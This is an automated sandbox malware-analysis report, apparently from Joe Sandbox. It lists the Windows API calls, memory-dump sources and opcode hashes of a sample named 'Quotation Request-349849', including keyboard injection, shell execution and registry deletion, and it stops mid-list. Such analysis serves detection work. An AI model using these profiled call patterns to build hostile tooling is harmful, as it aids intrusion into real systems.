                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 007D2ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 007D2B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 0080C21A
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0080C1C7,00000004,00000000,00000000,00000000), ref: 0080C286
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 95956d6fac2905c9308a521e77abb3c11f5b6ffe4b5ff1b1c770c2de88e205d2
                                                      • Instruction ID: 44cadc695920982919f35b62c6bfe8644efadbf23a64dbcac730b801a98968fe
                                                      • Opcode Fuzzy Hash: 95956d6fac2905c9308a521e77abb3c11f5b6ffe4b5ff1b1c770c2de88e205d2
                                                      • Instruction Fuzzy Hash: 5541B730704780AACB759B288C88B6B7BB2FBE5311F58C51BE546867A3C67D9843D711
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 008370DD
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00837114
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00837130
                                                      • _memmove.LIBCMT ref: 0083717E
                                                      • _memmove.LIBCMT ref: 0083719B
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 008371AA
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008371BF
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 008371DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 8c543b0d8527aec9889dfbd8fc511f9fffc175c153d04f8fff86edd3b90d972b
                                                      • Instruction ID: 4ca47a8b173353b6790557af892bff023d7e4bf5dc45517df21680b76f9c3f90
                                                      • Opcode Fuzzy Hash: 8c543b0d8527aec9889dfbd8fc511f9fffc175c153d04f8fff86edd3b90d972b
                                                      • Instruction Fuzzy Hash: C8315E76900209EBCF10EFA4DC899AEBB78FF45711F1441A5EA04EB356DB74DA14CBA0
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 008561EB
                                                      • GetDC.USER32(00000000), ref: 008561F3
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008561FE
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085620A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00856246
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00856257
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0085902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00856291
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008562B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 1584791b9945e6542874508589e35ea5dab10d8507bb590be910bb7fd7140c51
                                                      • Instruction ID: 2e2dd0bc44ee8f109036815aad7fa33b18370f6296973d70f756de69da35284c
                                                      • Opcode Fuzzy Hash: 1584791b9945e6542874508589e35ea5dab10d8507bb590be910bb7fd7140c51
                                                      • Instruction Fuzzy Hash: CF315C72101610BFEB118F508C8AFAB3BA9FF59766F044065FE08DA192D6799851CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 8606b70c915a0f17536d2d3d674ea89e97a901337771c37c31ad6499e53c34c6
                                                      • Instruction ID: ed1bd4ce5002ee95441bf5594e5550ddd9066c80a0a696298abb5d1b672d8121
                                                      • Opcode Fuzzy Hash: 8606b70c915a0f17536d2d3d674ea89e97a901337771c37c31ad6499e53c34c6
                                                      • Instruction Fuzzy Hash: 6C21A46160266EFBE6046611BD42FBB775DFF60368F084020FE04D6B87EB68DE5181A1
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • _wcstok.LIBCMT ref: 0083EC94
                                                      • _wcscpy.LIBCMT ref: 0083ED23
                                                      • _memset.LIBCMT ref: 0083ED56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 4ca6a62c91239df5a6cbc9d26a3725fb9c3c66c92eadb8befbb436fd753a7233
                                                      • Instruction ID: 3d5ac982735b93d83dd7762831b48da73402253c4abbc812ffa09a4ef5d4b9d3
                                                      • Opcode Fuzzy Hash: 4ca6a62c91239df5a6cbc9d26a3725fb9c3c66c92eadb8befbb436fd753a7233
                                                      • Instruction Fuzzy Hash: F8C13971508644DFC754EF28C889A6AB7F4FF85310F10492EF9999B3A2DB74E845CB82
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00846C00
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00846C21
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846C34
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00846CEA
                                                      • inet_ntoa.WSOCK32(?), ref: 00846CA7
                                                        • Part of subcall function 0082A7E9: _strlen.LIBCMT ref: 0082A7F3
                                                        • Part of subcall function 0082A7E9: _memmove.LIBCMT ref: 0082A815
                                                      • _strlen.LIBCMT ref: 00846D44
                                                      • _memmove.LIBCMT ref: 00846DAD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 5ffe54ea3002f2358e51534d92a36ffaff8c1578f75557a7a28b4a3d269b92b7
                                                      • Instruction ID: 110d6035e5ca9a740af0921eb36ccda9bd4b30d26f0a73d72080abb5fe50bb69
                                                      • Opcode Fuzzy Hash: 5ffe54ea3002f2358e51534d92a36ffaff8c1578f75557a7a28b4a3d269b92b7
                                                      • Instruction Fuzzy Hash: BE81D071604304ABC710EB28CC86F6AB7B8FF85724F14491AF655DB292EB75AD04CB92
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fba3b1aedbda91535846d447114127a06d2a03bf7019f1ea642d0a12cb1226b
                                                      • Instruction ID: e56858c1725473b70a9c7b4e2939d3bab8b4847bb072de227b9886a0042a9e01
                                                      • Opcode Fuzzy Hash: 8fba3b1aedbda91535846d447114127a06d2a03bf7019f1ea642d0a12cb1226b
                                                      • Instruction Fuzzy Hash: C5716930900209FFCB05DF98CD48ABEBB79FF85314F54815AF915AB291C738AA51CBA0
                                                      APIs
                                                      • IsWindow.USER32(01544C48), ref: 0085B3EB
                                                      • IsWindowEnabled.USER32(01544C48), ref: 0085B3F7
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0085B4DB
                                                      • SendMessageW.USER32(01544C48,000000B0,?,?), ref: 0085B512
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0085B54F
                                                      • GetWindowLongW.USER32(01544C48,000000EC), ref: 0085B571
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0085B589
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 045ae51fd874955e789433018b42149d9b37f52a09e2bba66908a4e9b6cc333b
                                                      • Instruction ID: e0577a8161e5c102466c09b62c91e3b950230394ee58f8b29245c3107b09e5d3
                                                      • Opcode Fuzzy Hash: 045ae51fd874955e789433018b42149d9b37f52a09e2bba66908a4e9b6cc333b
                                                      • Instruction Fuzzy Hash: 18718C34600604AFDF319F94C894FBABBA9FF69302F144069EE45E73A2C731A949CB54
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084F448
                                                      • _memset.LIBCMT ref: 0084F511
                                                      • ShellExecuteExW.SHELL32(?), ref: 0084F556
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                        • Part of subcall function 007EFC86: _wcscpy.LIBCMT ref: 007EFCA9
                                                      • GetProcessId.KERNEL32(00000000), ref: 0084F5CD
                                                      • CloseHandle.KERNEL32(00000000), ref: 0084F5FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: 837ec15d429a2c640a1bd63f8b72e1bc6f38de571a8f51999f0d293a7317b5fd
                                                      • Instruction ID: aaddb56383ecd5216c81e1a74da9ad4154932e74a20e0f1cab9bf4afd734ac5a
                                                      • Opcode Fuzzy Hash: 837ec15d429a2c640a1bd63f8b72e1bc6f38de571a8f51999f0d293a7317b5fd
                                                      • Instruction Fuzzy Hash: AE61AD75A00619DFCB04EF68C4859AEBBF5FF48310F15806EEA59AB352CB34AD41CB94
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00830F8C
                                                      • GetKeyboardState.USER32(?), ref: 00830FA1
                                                      • SetKeyboardState.USER32(?), ref: 00831002
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00831030
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0083104F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00831095
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008310B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
                                                      • Instruction ID: d2609fd02a5bc4475d070c26291d61e1129fb39282fb98b14ae51221677c4d26
                                                      • Opcode Fuzzy Hash: 0e7d87dad6b7b91b8743b2637adaa4763620925d1b44cb672ad1991954b2d5b0
                                                      • Instruction Fuzzy Hash: F551E6A0504BD53DFF3642348C29BBABEA9BB86B04F088589E1D5C58D3C6D9DCC4D791
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00830DA5
                                                      • GetKeyboardState.USER32(?), ref: 00830DBA
                                                      • SetKeyboardState.USER32(?), ref: 00830E1B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00830E47
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00830E64
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00830EA8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00830EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
                                                      • Instruction ID: 7834f7191bedfac4a1798d186701d1fe297abee0fc66fc29487b38ec4e7f1b34
                                                      • Opcode Fuzzy Hash: 383517149bf4cd7e9af2cd363aed31e37b40cf98b7afd44891cf8ff54c3d8f0f
                                                      • Instruction Fuzzy Hash: 1951E6A06087D53DFB3283748C65B7A7EE9FB86300F088989E1D4C64C2D795AC94DB91
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: 89baeda2ab8a4e237d580940f87490ee495a16523d692222b25df2a4ca8581a1
                                                      • Instruction ID: cb9a0310724f7e7b78caea99d8c9e3e4291430e6c0fc8780338568cdfd65d64c
                                                      • Opcode Fuzzy Hash: 89baeda2ab8a4e237d580940f87490ee495a16523d692222b25df2a4ca8581a1
                                                      • Instruction Fuzzy Hash: 16418365C1161CB6CB11EBF48C4AADFB3B8AF44310F508956E618E3221FA38A255C7E6
                                                      APIs
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00833697,?), ref: 0083468B
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00833697,?), ref: 008346A4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 008336B7
                                                      • _wcscmp.LIBCMT ref: 008336D3
                                                      • MoveFileW.KERNEL32(?,?), ref: 008336EB
                                                      • _wcscat.LIBCMT ref: 00833733
                                                      • SHFileOperationW.SHELL32(?), ref: 0083379F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: dc61b281ba6e295f4dd2af09bdcbb7d3fe01ff27abaf033932fa03fc6e53fe53
                                                      • Instruction ID: 59029745c6b3b085064ee0769bd0c330433da2d923403763eb4b71428c237491
                                                      • Opcode Fuzzy Hash: dc61b281ba6e295f4dd2af09bdcbb7d3fe01ff27abaf033932fa03fc6e53fe53
                                                      • Instruction Fuzzy Hash: 6E417EB1508344AED751EF64D4469EFB7E8FF98380F40192EB49AC3251EB38D689C792
                                                      APIs
                                                      • _memset.LIBCMT ref: 008572AA
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00857351
                                                      • IsMenu.USER32(?), ref: 00857369
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008573B1
                                                      • DrawMenuBar.USER32 ref: 008573C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: ded161632662e9e83e19f6062acd0529379ce48817852b33f791a0aad698db75
                                                      • Instruction ID: 8fa6f36e2114bc7f72862ca5264b7e99f87233814d6ce9583080dc73e870098c
                                                      • Opcode Fuzzy Hash: ded161632662e9e83e19f6062acd0529379ce48817852b33f791a0aad698db75
                                                      • Instruction Fuzzy Hash: 58412475A04208EFDB20DF50E884AEABBB9FF08366F548469FD05AB350D730AD58DB50
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00850FD4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00850FFE
                                                      • FreeLibrary.KERNEL32(00000000), ref: 008510B5
                                                        • Part of subcall function 00850FA5: RegCloseKey.ADVAPI32(?), ref: 0085101B
                                                        • Part of subcall function 00850FA5: FreeLibrary.KERNEL32(?), ref: 0085106D
                                                        • Part of subcall function 00850FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00851090
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00851058
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: 0a849f4196e76c6ffcd77139284713dafa8c290428bcf5a97a79c8e30c59f5a1
                                                      • Instruction ID: 3445b81038f2cb587b73b03f395b186b763257dcf87fb8fc0ef5f9e762f7b252
                                                      • Opcode Fuzzy Hash: 0a849f4196e76c6ffcd77139284713dafa8c290428bcf5a97a79c8e30c59f5a1
                                                      • Instruction Fuzzy Hash: 74310A71900609BFDF159B94DC89EFFB7BCFF08351F040169EA01E2181EB749E899AA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008562EC
                                                      • GetWindowLongW.USER32(01544C48,000000F0), ref: 0085631F
                                                      • GetWindowLongW.USER32(01544C48,000000F0), ref: 00856354
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00856386
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008563B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008563C1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008563DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DB2E
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0082DB54
